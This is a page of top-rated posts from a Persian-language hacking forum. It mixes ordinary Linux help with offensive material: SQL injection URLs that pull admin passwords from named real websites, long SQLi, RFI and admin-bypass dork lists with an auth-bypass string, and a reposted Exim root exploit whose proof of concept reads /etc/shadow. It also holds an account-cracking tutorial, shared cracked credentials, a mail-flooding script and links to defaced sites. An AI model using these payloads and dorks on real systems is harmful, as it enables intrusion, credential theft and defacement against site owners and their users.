discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      69

    • تعداد ارسال ها

      2,564


  2. ahmad0025

    ahmad0025

    کاربر انجمن


    • امتیاز

      27

    • تعداد ارسال ها

      82


  3. sir.turk

    sir.turk

    کاربر تازه وارد


    • امتیاز

      11

    • تعداد ارسال ها

      20


  4. mhmdn

    mhmdn

    کاربر تازه وارد


    • امتیاز

      9

    • تعداد ارسال ها

      208



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در دوشنبه, 24 شهریور 1399 در همه بخش ها

  1. 3 امتیاز
    9- https://water-withfuture.com/product_more.php?id=-8%27+union+select+1,2,group_concat(admin_username,0x3a,admin_password),4,5,6+from+grand_admin--+ 10- https://maytrade.net/new.php?id=-1%27+/*!12345union*/+/*!12345select*/+1,2,3,/*!12345group_concat(AdminName,0x3a,AdminPass,%27%3Cbr%3E%27)*/,5,6,7+/*!12345from*/+admin--+ 11- http://gaspforair.org/gasp/gedc/artcl-new.php?ID=48+union+select+1,2,group_concat(email,0x3a,password,0x3a,name,%27%3Cbr%3E%27),4,5+from+advocacy_users-- 12- http://www.kefac.com.eg/new.php?id=-5%27+union+select+1,2,3,group_concat(AdminName,0x3a,AdminPass,%27%3Cbr%3E%27),5,6,7,8+from+admin--+ موفق و پیروز باشید .
  2. 1 امتیاز
    Mahdikarami

    سوال

    من یک تازه کار در هک هستم. میشه گفت من یک هکر کلاه صورتی هستم. میخواهم وارد هک شوم اگه میشود یکی مرا را راهنمایی کند.
  3. 1 امتیاز
  4. 1 امتیاز
    DeMoN

    مشکل در کالی

    سلام. من هم این مشکل رو داشتم ولی خوب حل شد برای رفع مشکل شما دو راه دارید. 1-به صورت دستی در تنظیمات بایوس در بخش smart control تنظیمات CPU و کارت گرافیم رو دستی انجام بدین. 2-اقدام به نصب ابزار lm-sensors از طریق sof manager یا ترمینال با دستور زیر apt-get install lm-sensors بعد از نصب دستور sensors-detect و تمام گزینه هارو yes میزنید. بعد با استفاده از دستور nano /etc/modules یا leafpad /etc/modules تمام عبارات بعد از #chip drivers coretemp رو پاک کنید بعد برای کنترل کامل و با توجه به قدرت cpu که گفتیم بهترین راه نصب ابزار i8kutils این ابزار رو هم میتونید از طریق ترمینال یا soft manager نصب کنید. apt-get install i8kutils بعد از نصب دستور nano /etc/i8kmon.conf یا دستور leafpad /etc/i8kmon.conf رو میزنید و محتوای کانفیگ زیر رو درش قرار میدید و ذخیره میکنید. این مشخصات با توجه به قدرت سخت افزار شما قرار میگیره. # Run as daemon, override with --daemon option set config(daemon) 0 # Automatic fan control, override with --auto option set config(auto) 1 # Report status on stdout, override with --verbose option set config(verbose) 1 # Status check timeout (seconds), override with --timeout option set config(timeout) 20 # Temperature thresholds: {fan_speeds low_ac high_ac low_batt high_batt} set config(0) {{-1 0} -1 40 -1 40} set config(1) {{-1 1} 30 60 30 60} set config(2) {{-1 2} 59 100 59 100} # For computer with 2 fans, use a variant of this instead: # Temperature thresholds: {fan_speeds low_ac high_ac low_batt high_batt} # set config(0) {{-1 0} -1 52 -1 65} # set config(1) {{-1 1} 41 66 55 75} # set config(2) {{-1 1} 55 80 65 85} # set config(3) {{-1 2} 70 128 75 128} # end of file سپس مخازن رو آپدیت کنید و تمام. مشکل من به این شکل حل شد. نکته:اگر موفق به نصب ابزار ها از طریق ترمینال نشدید در soft manager ابزار ها وجود دارن و میتونید با یک کلیک اقدام به نصب کنید. برای نظارت به قدرت و عملکرد قطعات سخت افزاریتون هم میتونید ابزار Psensor رو نصب کنید. apt-get install psensor موفق باشید
  5. 1 امتیاز
    سلام.من بعضی وقتها وقتی یه مدت از اتصالم به اینترنت میگذره یه علامت وای فای با علامت سوال روش میاد.به شکل زیر: که وقتی بازش میکنم مینویسه ورود به شبکه *** که * اسم شبکه خودمه. این اتفاق گاهی اوقات می اوفته. نه همیشه.وقتی هم که روش میزنم این صفحه باز میشه: آیا کسی به شبکه وای فای من ورود پیدا کرده؟ و تبدیل خودکار صفحه homepage مرور گر به صفحه لاگین مودم دلیلش چیه؟
  6. 1 امتیاز
    تاپیک سوال قدیمی هست وکاربر دیگه در انجمن حضور ندارن. موفق باشید قفل./
  7. 1 امتیاز
    Dork sql Asp ".asp?bookID=" ".asp?cart=" ".asp?cartID=" ".asp?catalogid=" ".asp?category_list=" ".asp?CategoryID=" ".asp?catID=" ".asp?cid=" ".asp?code_no=" ".asp?code="
  8. 1 امتیاز
    RFI dorks 201 /_functions.php?prefix= /cpcommerce/_functions.php?prefix= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/agendax/addevent.inc.php?agendax_path= /ashnews.php?pathtoashnews= /eblog/blog.inc.php?xoopsConfig[xoops_url]= /pm/lib.inc.php?pm_path= /b2-tools/gm-2-b2.php?b2inc= /modules/mod_mainmenu.php?mosConfig_absolute_path= /includes/include_once.php?include_file= /e107/e107_handlers/secure_img_render.php?p= /shoutbox/expanded.php?conf= /main.php?x= /myPHPCalendar/admin.php?cal_dir=
  9. 1 امتیاز
    حقیقت همان دروغی است كه بارها و بارها تكرار شده است
  10. 1 امتیاز
    بنام خدا شروع این موضوع iOS از ابتدا بهتر خواهد بود. اطلاعات که من دوست دارم در اینجا در میان بزارم از ساختار امنیتی آی او اس گرفته تا Jailbreack and jailbreack types و حملات baseband در بر خواهد گرفت. بسیاری از افراد معتقد اند که آی او اس از اول همین امنیت خوب را داشته. نخیر آقا . ای او اس اون ورژن های اولیش اصلا امنیت در خود نداشتن مثل همین اینترنیت مون که حالا همه به فک امنیتش هستند. خب این حرف ها زیاد است و بحث امنیت با آمدن به طور مثال ...iPad2 داغ تر شد. به این دلیل که ipad2 موضوع Dual-core processors را در خود داشت وباعث شد تا iOS allocator to work in full swing این معنی که اکسپلویت ها در محیط multi-processor آنقدر مفید نبودند. به این دلیل که memory management در بین این process ها تقسیم شده و memory را بهتر مجزا ساخت که به انگلیسی به ان میگویند isolated the memory and that made the crossing between processes harder. انگلیسی و فارسی زیاد شد تو این اولین پست .امیدوارم پست های بعدی من اینجوری نباشه. چند نکته مورد امنیت در iOS ۱. اپلیکیشن ها در اپل بررسی میشوند ۲. و با private key اپل تایید می شوند ۳. کم کردن attack Surface ۴. در iOS شیل یا shell (/bin/sh)l موجود نیست به همین دلیل باید از طریقه های دیگری استفاده کرد ۵. privilege separation به این معنی که اگر هکر دسترسی کامل ..بطور مثال ...در مرورگر را هم داشته باشد نمی تواند کار خیلی خوبی رو انجام دهد. ۶. تمام باینری ها و لایبری ها همه باید توسط اپل تایید شوند که به انگلیسی به ان می گویند Code Signing ۷. و sandboxing و یه دو یا سه موضوع دیگری هم هستش که فعلا به خاطر ندارم بعدا خواهم گفت. سوال داشتید بپرسید. موفق باشید پست های بعدی بهتر خواهد بود.
  11. 1 امتیاز
    ahmad0025

    آموزش کرک اکانت

    سلام دوستان در این تایپک اموزش کرک اکانت با نرم افزار سنتر(mba)را اموزش بدم خوب پیش نیاز: نرم افزار mba:لینک دانلود کمبولیست:در انجمن موجود است پروکسی:فعلا لازم نداریم خوب تمام نرم افزار و فایل های لازم را دانلود کنید تا فردا اموزش اصلی را شروع میکنیم
  12. 1 امتیاز
  13. 1 امتیاز
    amir.p.h

    hACK INSTAGRAM

    slm khaste nabashid mikhastam esme barname hack instagramo k mesele afzayesh like mimone bad taraf user ba pas sho mizane user pasesh miyad bara mno bebinm chiye mishe khaheshan komak konid
  14. 1 امتیاز
    aalliiaa

    مشکل در نصب کالی

    میگه CPU ضعیفه :/ کالی 64 بیت قدرت عملش بالاتره نسبت ب 32 بیت
  15. 1 امتیاز
    دورک باگ RFI /components/com_flyspray/startdown.php?file= /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= /components/com_simpleboard/file_upload.php?sbp= /components/com_hashcash/server.php?mosConfig_absolute_path= /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path= /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= /components/com_performs/performs.php?mosConfig_absolute_path= /components/com_forum/download.php?phpbb_root_path= /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path= /components/minibb/index.php?absolute_path= /components/com_smf/smf.php?mosConfig_absolute_path= /modules/mod_calendar.php?absolute_path= /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path= /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= /components/com_securityimages/configinsert.php?mosConfig_absolute_path= /components/com_securityimages/lang.php?mosConfig_absolute_path= /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= /components/com_galleria/galleria.html.php?mosConfig_absolute_path= /akocomments.php?mosConfig_absolute_path= /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= /cropcanvas.php?cropimagedir= /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path= /components/com_zoom/includes/database.php?mosConfig_absolute_path= /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= /components/com_fm/fm.install.php?lm_absolute_path= /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path= /components/com_lmo/lmo.php?mosConfig_absolute_path= /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path= /administrator/components/com_webring/admin.webring.docs.php?component_dir= /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path= /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= /components/com_mambowiki/Mam***ogin.php?IP= /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= /components/com_cpg/cpg.php?mosConfig_absolute_path= /components/com_moodle/moodle.php?mosConfig_absolute_path= /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= /components/com_mospray/scripts/admin.php?basedir= /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path= /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path= /components/com_madeira/img.php?url= /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path= /components/com_bsq_sitestats/external/rssfeed.php?baseDir= /com_bsq_sitestats/external/rssfeed.php?baseDir= /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path= /administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path= /components/com_joomlaboard/file_upload.php?sbp= /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= /components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path= /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path= /components/com_thopper/inc/request_type.php?mosConfig_absolute_path= /components/com_thopper/inc/responses_type.php?mosConfig_absolute_path= /components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path= /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path= /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path= /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path= /modules/mod_weather.php?absolute_path= /components/calendar/com_calendar.php?absolute_path= /modules/calendar/mod_calendar.php?absolute_path= /components/com_calendar.php?absolute_path= /modules/mod_calendar.php?absolute_path= /components/com_mosmedia/media.tab.php?mosConfig_absolute_path= /components/com_mosmedia/media.divs.php?mosConfig_absolute_path= /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site= /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site= /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path= /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path= /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path= /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path= /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path= /administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
  16. 1 امتیاز
    مجموعه کامل دورک های بایپس ادمین پیج allinurl:index.php?db=information_schema allinurl:index.php?db=test inurl:wp-content/plugins/age-verification/age-verification.php inurl:"/showPlayer.php?id=" intext:"powered by ellistonSPORT inurl:mod.php?mod=blog" intext:"powered by DIY-CMS inurl:cgi-bin/cosmobdf.cgi? allintext:D.N.I filetype:xls (username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp intitle:SpectraIV-IP Powered by kryCMS inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ] inurl:admin.asp inurl:login/admin.asp inurl:admin/login.asp inurl:adminlogin.asp inurl:adminhome.asp inurl:admin_login.asp inurl:administratorlogin.asp inurl:login/administrator.asp inurl:administrator_login.asp یوزر و پسورد: '=' 'or'
  17. 1 امتیاز
    genius

    vps چیست

    سلام vpsچیه ؟ چرا همه دنبال کرک vps هستن؟
  18. 1 امتیاز
    ahmad0025

    vps چیست

    vps سرور مجازی میباشد که از سرعتی بالا برخوردار است که اکثرا برای ddos کردن و کرک کردم ازشون استفاده میشود بدون اینکه ip خودشان منتشر شود و سرعت اپلود و دانلود بالایی دارد
  19. 1 امتیاز
    genius

    vps چیست

    داداش شما اگه میتونی راهنمایی کنی بیا خصوصی پیام بده اون سوال هایی که پرسییدم
  20. 1 امتیاز
    با سلام . قبل از همه چی پیشنهاد میکنم اول تاپیک تون رو درجاهای مناسب مثب انجمن های عمومی مطرح نمایید . تا از ارزش تاپیک های گارد ایران کم نشه . اگر قرار باشه برای هر مشکل و هر سوال تاپیکی باز کنید کل انجمن بهم میریزه و در ادامه پاسخ باید عرض کنم . که نباید به هیچ عنوان آنتی ویروستون فعال باشد باید اونو غیر فعال کنید . بعد از خاموش کردن برنامه رو اجرا کنید . اگر آنتی ویروس غیر فعال باشد حذف نمیشود . اگر بازهم مشکل داشت و حذف شد از یکجای دیگر برنامه را تهیه نمایید . اگر بعد از اجرا فورا بسته میشود دو دلیل دارد 1 اینکه شما دارید یک فایل اشتباهی را بجای خود برنامه باز میکنید 2 برنامه مشکل داره
  21. 1 امتیاز
    ########################### # Exim 4.86.2 Local Privilege Escalation Vulnerability ########################### ============================================= - Release date: 10.03.2016 - Discovered by: Dawid Golunski - Severity: High/Critical ============================================= I. VULNERABILITY ------------------------- Exim < 4.86.2 Local Root Privilege Escalation II. BACKGROUND ------------------------- "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of Sendmail, although the configuration of Exim is quite different." http://www.exim.org/ III. INTRODUCTION ------------------------- When Exim installation has been compiled with Perl support and contains a perl_startup configuration variable it can be exploited by malicious local attackers to gain root privileges. IV. DESCRIPTION ------------------------- The vulnerability stems from Exim in versions below 4.86.2 not performing sanitization of the environment before loading a perl script defined with perl_startup setting in exim config. perl_startup is usually used to load various helper scripts such as mail filters, gray listing scripts, mail virus scanners etc. For the option to be supported, exim must have been compiled with Perl support, which can be verified with: [dawid@centos7 ~]$ exim -bV -v | grep i Perl Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP To perform the attack, attacker can take advantage of the exim's sendmail interface which links to an exim binary that has an SUID bit set on it by default as we can see below: [dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim lrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim [dawid@centos7 ~]$ ls -l /usr/sbin/exim -rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim Normally, when exim sendmail interface starts up, it drops its root privileges before giving control to the user (i.e entering mail contents for sending etc), however an attacker can make use of the following command line parameter which is available to all users: -ps This option applies when an embedded Perl interpreter is linked with Exim. It overrides the setting of the perl_at_start option, forcing the starting of the interpreter to occur as soon as Exim is started. As we can see from the documentation at: http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html the perl_at_start option does the following: "Setting perl_at_start (a boolean option) in the configuration requests a startup when Exim is entered." Therefore it is possible to force the execution of the perl_startup script defined in the Exim's main config before exim drops its root privileges. To exploit this setting and gain the effective root privilege of the SUID binary, attackers can inject PERL5OPT perl environment variable, which does not get cleaned by affected versions of Exim. As per perl documentation, the environment variable allows to set perl command-line options (switches). Switches in this variable are treated as if they were on every Perl command line. There are several interesting perl switches that that could be set by attackers to trigger code execution. One of these is -d switch which forces perl to enter an interactive debug mode in which it is possible to take control of the perl application. An example proof of concept exploitation using the -d switch can be found below. V. PROOF OF CONCEPT ------------------------- [dawid@centos7 ~]$ head /etc/exim/exim.conf ###################################################################### # Runtime configuration file for Exim # ###################################################################### # Custom filtering via perl perl_startup = do '/usr/share/exim4/exigrey.pl' [dawid@centos7 ~]$ exim -bV -v | grep -i Perl Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP [dawid@centos7 ~]$ PERL5OPT="-d/dev/null" /usr/sbin/sendmail.exim -ps victim@localhost Loading DB routines from perl5db.pl version 1.37 Editor support available. Enter h or 'h h' for help, or 'man perldebug' for more help. Debugged program terminated. Use q to quit or R to restart, use o inhibit_exit to avoid stopping after program termination, h q, h R or h o to get additional info. DB<1> p system("id"); uid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 0 DB<2> p system("head /etc/shadow"); root:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7::: bin:*:16372:0:99999:7::: daemon:*:16372:0:99999:7:: [...] VI. BUSINESS IMPACT ------------------------- This vulnerability could be exploited by attackers who have local access to the system to escalate their privileges to root which would allow them to fully compromise the system. VII. SYSTEMS AFFECTED ------------------------- Exim versions before the latest patched version of Exim 4.86.2 are be affected by this vulnerability, if Exim was compiled with Perl support and the main configuration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains a perl_startup option e.g: perl_startup = do '/usr/share/exim4/exigrey.pl' It is important to note that the file does not necessarily have to exist to exploit the vulnerability. Although the path must be specified. VIII. SOLUTION ------------------------- Update to Exim 4.86.2 which contains the official patch that fixes the environment sanitization issues. IX. REFERENCES ------------------------- http://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt http://www.exim.org/ http://www.exim.org/static/doc/CVE-2016-1531.txt http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html https://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f X. ADVISORY CREATED BY ------------------------- This advisory has been created by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- March 10th, 2016: Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-03-12] ########################### http://iedb.ir/exploits-4889.html
  22. 1 امتیاز
    هی...بگزریم ...ماکه گذشتیم... . . . . . گفتم جو عوض شه... البته اگه خواستبن منم مجموعه کامل کتاب اموزش : c# c++ css html php & my sql vb js رو می تونم در اختیارتون بزارم...
  23. 1 امتیاز
    با سلام آقا ایمان من قوانین رو مطالعه کردم . و تقریبا تا الان شرایطش تکمیل شده میخواستم بدونم کی میتونم در تیم دیفیس انجمن فعالیت کنم ؟
  24. 1 امتیاز
    http://zone-hc.com/archive/mirror/b9d5c3c_ric.kku.ac.th_mirror_.html http://zone-hc.com/archive/mirror/db270c2_corporacionintergraf.com_mirror_.html
  25. 1 امتیاز
    درود. قبل از ارسال پست حتما سرچ کنید و اگر موضوع رو پیدا نکردید تاپیک باز کنید. موفق باشید http://guardiran.org/forums/forum/134-%D8%AA%D8%B1%D9%88%D8%AC%D8%A7%D9%86-%D9%88-%DA%A9%DB%8C%D9%84%D8%A7%DA%AF%D8%B1/
  26. 1 امتیاز
    http://zone-hc.com/archive/mirror/2104fbe_gentepizza.ro_mirror_.html http://zone-hc.com/archive/mirror/f44531c_laihuapeixun.chinesecio.com_mirror_.html http://zone-hc.com/archive/mirror/885d53a_jnvjhansi.org_mirror_.html] http://zone-hc.com/archive/mirror/06c6fde_nexnet.cz_mirror_.html http://zone-hc.com/archive/mirror/824954e_sport-emotions.fr_mirror_.html http://zone-hc.com/archive/mirror/0c8eab7_esnor.bhdesign.com.br_mirror_.html
  27. 1 امتیاز
    درود. بسیار عالی.ابتدا قوانین عضویت در تیم دیفیس رو مطالعه بفرمایید.سپس شروع به فعالیت با شرایط خواسته شده بکنید تا رنکینگ شما اهدا شود. موفق باشید
  28. 1 امتیاز
    دنیا کوچک نیست دل کوچیک
  29. 1 امتیاز
    با عرض سلام و ارادت خدمت تمامی بر و بچ هکر و باحال و مشتی ! غرض از مزاحمت اینه که دوستان بنده یک لب تاب قدیمی دارم ( خیلی قدیمی ماله ۲۰۰۳ هستش ) به خاطر اینم که از ویندوز یک جورایی بدم میاد و هم اینکه نمیتونه ویندوز رو بکشه از اوبونتو استفاده میکنم . میخواستم از اساتید محترم خواهش کنم اگر کسی روش هک وایرلس با اوبونتو رو بلده و از اونجایی که تازه لینوکسی شدم و تقریبا هیچی بارم نیست (‌در حد Sudo ) به همین دلیل لطفا به صورت مرحله به مرحله و الگریتمی به بنده یاد بدهید .... چاکر همه لوتی های گارد ایران
  30. 1 امتیاز
    ahmad0025

    آموزش کرک اکانت

    سلامی دوباره استقبال خیلیییی کمه این قسمت رو دست نزنید این دو تا تیک رو بزنید تو قسمت قرمز کلیک راست کنید و روی add اولی کلیک کنید و متن زیر را وارد کنید و ok رو بزنید حالا تو قسمت سبز کلیک راست کنید و گزینه add اولی رو کلیک کنید و متن زیر رو وارد کنید و ok رو بزنید حالا دوباره تو قسمت سبز کلیک راست کنید و روی add اولی کلیک کنید و متن زیر را وارد کنید و ok بزنید حالا برید تو قسمت Lists و تو قسمت wordlist کمبولیست رو لود کنید حالا میریم تو قسمت progression حالا bots رو روی 9 قرار میدیم حالا go رو بزنید و صبر کنید تو قسمت HITS یک یوزر بیاد و اون یوزر کرک شده و استفاده کنید
  31. 1 امتیاز
    در این قسمت اکانت های کرک شده قرار می گیرد توجه قوانین: 1-درخواست اکانت نکنید 2-سایت های ایرانی که فیلتر نمی شن ممنوع 3-رمز رو تغییر ندید 4-بی ادبی نکنید 5-اسپم ممنوع 6-تشکر اجباری تایپک قبلی نظم نداشت این اکانت ها کاملا اختصاصی هستند کپی بدون نوشتن :گارد ایران ممنوع
  32. 1 امتیاز
    اکانت سایت p98net اعتبار:2016/3/5 ادرس:http://user.p98net.in/IBSng/user/ یوزر و پسورد:85:85 توضیح: اکانت سایت فندوق شکن
  33. 1 امتیاز
    sajad325

    اینترنت free isp

    لطفا پاسخ بدید و اگر هم نمیتونید جواب رو به خصوصی بفرستید
  34. 1 امتیاز
    D0r0d http://zone-hc.com/archive/mirror/e41c481_hep.gob.pe_mirror_.html
  35. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=132761 http://www.aljyyosh.org/mirror.php?id=132760 http://www.aljyyosh.org/mirror.php?id=132759 http://www.aljyyosh.org/mirror.php?id=132758 http://www.aljyyosh.org/mirror.php?id=132756 http://www.aljyyosh.org/mirror.php?id=132757 http://www.aljyyosh.org/mirror.php?id=132755 http://www.aljyyosh.org/mirror.php?id=132754 http://www.aljyyosh.org/mirror.php?id=132753 http://www.aljyyosh.org/mirror.php?id=132752 http://www.aljyyosh.org/mirror.php?id=132751 http://www.aljyyosh.org/mirror.php?id=132750 http://www.aljyyosh.org/mirror.php?id=132749 http://www.aljyyosh.org/mirror.php?id=132748 http://www.aljyyosh.org/mirror.php?id=132747 http://www.aljyyosh.org/mirror.php?id=132746 http://www.aljyyosh.org/mirror.php?id=132745 http://www.aljyyosh.org/mirror.php?id=132744 http://www.aljyyosh.org/mirror.php?id=132743 http://www.aljyyosh.org/mirror.php?id=132742
  36. 1 امتیاز
    با سلام در بخش های برنامه نویسی و هک و امنیت میتونم کمکتون کنم
  37. 1 امتیاز
    درود عزیزان فعالیت خودتون رو در بخش های مربوطه آغاز کنید مورد برسی قرار میگیرد موفق و سربلند باشید
  38. 1 امتیاز
  39. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=280069
  40. 1 امتیاز
    R3dC0d3r

    اسکریپت mailFlood

    با سلام در این مطلب اسکریپت mailFlood رو که در زبان زیبایه پایتون نوشته شده رو براتون آماده کردم یک توضیح کوچیک : این اسکریپت همانند همون اسپمر های خودمون عمل میکنه ! در واقع یک تعداد ایمیل زیاد (که تعدادش قابل تعیین کردنه) رو از طرف شما میفرسته به یک میل باکسه دیگه هدف فقط آموزشه سعی کنید کد ها رو با دقت برسی کنید رمز فایل : guardiran.org mailFlood.zip
  41. 1 امتیاز
    barry

    بازکردن قفل گوشی

    اموزش باز شدن رمز و الگو روی گوشی ها که روی اکثر گوشی ها امتحان شده گوشی رو خاموش کنید وقتی که خاموش شد دکمه ی روشن کردن گوشی و خانه رو همزمان بگیرین اگه نشد دکمه ی روشن با کم کردن صدا رو هم زمان بگیرید بعد یه پنجره باز میشه که دوتا گزینه داره با استفاده از کلید های کم و زیاد کردن صدای گوشی گزینه پایینی یعنی دومی رو انتخاب میکنید با فشار دادن دکمه ی روشن خاموش اونو انتخاب میکنید توجه: با این کار گوشی به تنظیمات کارخانه برمیگرده و تمام رمز ها برداشته میشود تشکر یادت نره
  42. 1 امتیاز
    به گزارش خبرنگار فناوری اطلاعات خبرگزاری فارس به نقل از واشنگتن پست، با این کار آژانس امنیت ملی آمریکا و ستاد ارتباطات دولت انگلیس موفق به استراق سمع از میلیون ها مشترک تلفن همراه در سراسر جهان شده اند. زیرا کلیدهای رمز سیم کارت‌های آنها را به راحتی هک کرده‌اند. اسناد مربوط به این رسوایی که توسط ادوارد اسنودن پیمانکار سابق آژانس امنیت ملی آمریکا به دست آمده، نشان می‌دهد که شرکت هلندی Gemalto هدف این حمله هکری بوده است. Gemalto بزرگترین شرکت تولیدکننده سیم کارت در جهان است. تمامی اپراتورهای مخابراتی بزرگ آمریکا از جمله مشتریان Gemalto هستند و این شرکت سالانه دو میلیارد سیم کارت تولید می کند. این سیم کارت ها حاوی تراشه هایی هستند که کوچکتر از بند انگشت بوده و برای ذخیره سازی فهرست تماس ها، پیام ها، شماره همراه کاربر و نگهداری کلید رمزگذاری مورد نیاز برای خصوصی نگهداشتن داده ها به کار می روند. Gemalto یک کپی از کلید رمزگذاری هر سیم کارت را برای اپراتور مخابراتی می فرستد تا قادر به شناسایی گوشی کاربر باشد. اما ستاد ارتباطات دولت انگلیس با حمله به کارکنان Gemalto و ارسال ایمیل های گمراه کننده برای آنها موفق به یافتن افرادی شد که به هسته شبکه این شرکت و سیستم های تولیدکننده کلیدهای رمزگذاری دسترسی داشته باشند. با این کار استراق سمع از ارتباطات مردم در دهها شبکه تلفن همراه برای آژانس امنیت ملی تسهیل شد. اسناد افشا شده جزییات بیشتری را از این جاسوسی افشا نمی‌کند، اما بر طبق آنها این اقدام از سال 2010 به بعد در جریان بوده است.
  43. 1 امتیاز
